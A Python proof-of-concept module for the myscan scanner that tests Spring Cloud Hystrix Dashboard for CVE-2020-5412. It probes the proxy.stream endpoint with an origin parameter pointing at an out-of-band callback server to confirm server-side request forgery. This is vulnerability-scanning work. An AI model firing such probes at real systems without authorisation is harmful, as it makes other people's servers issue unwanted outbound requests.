#!/usr/bin/env python3
# @Time    : 2020/10/15
# @Author  : caicai
# @File    : poc_spring-cloud-netflix-hystrix-dashboard_CVE-2020-5412_2020.py

'''
Setting up a local test instance:
git clone https://github.com/mkheck/aou-hystrix-dashboard
mvn package
java -jar target.jar
curl -v localhost:8080
'''

from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import scan_set
from myscan.lib.core.common_reverse import generate, query_reverse
from myscan.lib.core.common import get_random_str


class POC():
    """Out-of-band check for CVE-2020-5412 (Hystrix Dashboard ``proxy.stream``).

    The check asks the target to load a stream from an ``origin`` that points
    at the scanner's reverse (callback) platform, then asks that platform
    whether a callback carrying one of the generated tokens was recorded.
    A recorded callback indicates that the ``origin`` value caused an outbound
    HTTP request or DNS lookup, i.e. a server-side request forgery.
    The HTTP response from the target itself is never inspected.

    Remediation guidance is in the vendor advisory referenced by ``vulmsg``.
    """

    def __init__(self, workdata):
        """Store the work item and the static metadata reported with a finding.

        Args:
            workdata: mapping that provides ``dictdata`` and ``data``.
        """
        # Directory URL under test; the framework passes it with a trailing
        # "/" (for example https://www.baidu.com/home/).
        target_dir = workdata.get("data")
        # Parsed request data as a Python dict; see the "Example dict" section
        # of the development guide under docs/.
        self.dictdata = workdata.get("dictdata")
        self.url = target_dir
        # Findings. Every entry is a dict with the keys name, url, level and
        # detail, and the value of detail must itself be a dict (see verify).
        self.result = []
        self.name = "CVE-2020-5412_2020"
        self.vulmsg = "detail:https://zhzhdoai.github.io/2020/09/01/CVE-2020-5412%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0/,https://tanzu.vmware.com/security/cve-2020-5412"
        self.level = 2  # 0:Low  1:Medium 2:High

    def verify(self):
        """Probe ``proxy.stream`` and record a finding on a confirmed callback.

        Sends one GET per callback type (HTTP, then DNS) and then queries the
        reverse platform for each token. At most one finding is appended to
        ``self.result``. Returns None in every case.
        """
        # Respect the directory depth configured as max_dir in config.py so
        # deeply nested directories are not probed.
        slash_count = self.url.count("/")
        depth_limit = int(scan_set.get("max_dir", 2)) + 2
        if slash_count > depth_limit:
            return

        # generate() returns a pair: the first element is used as the callback
        # URL (HTTP case), the second as the token that is later looked up.
        http_callback, http_token = generate(get_random_str(10).lower(), "http")
        _, dns_token = generate(get_random_str(10).lower(), "dns")

        user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        for origin in (http_callback, "http://" + dns_token):
            # The response is discarded on purpose: detection relies only on
            # the callback. verify=False turns off TLS certificate validation
            # for the probe request.
            request(
                url=self.url + "proxy.stream?origin={}".format(origin),
                method="GET",
                headers={"User-Agent": user_agent},
                verify=False,
                timeout=10,
            )

        for position, token in enumerate((http_token, dns_token)):
            # Only the first lookup passes sleep=True; presumably that gives
            # the callback time to arrive (confirm against query_reverse).
            hit, _record = query_reverse(token, position == 0)
            if not hit:
                continue
            finding_detail = {
                "vulmsg": self.vulmsg,
                # Stored verbatim as a template; the actual callback URL is
                # not substituted into this string.
                "path": "proxy.stream?origin={reverseurl}",
                "others": "{} in reverse db".format(token),
            }
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": self.level,  # 0:Low  1:Medium 2:High
                "detail": finding_detail,
            })
            # One confirmed callback is enough; do not report the same target twice.
            break
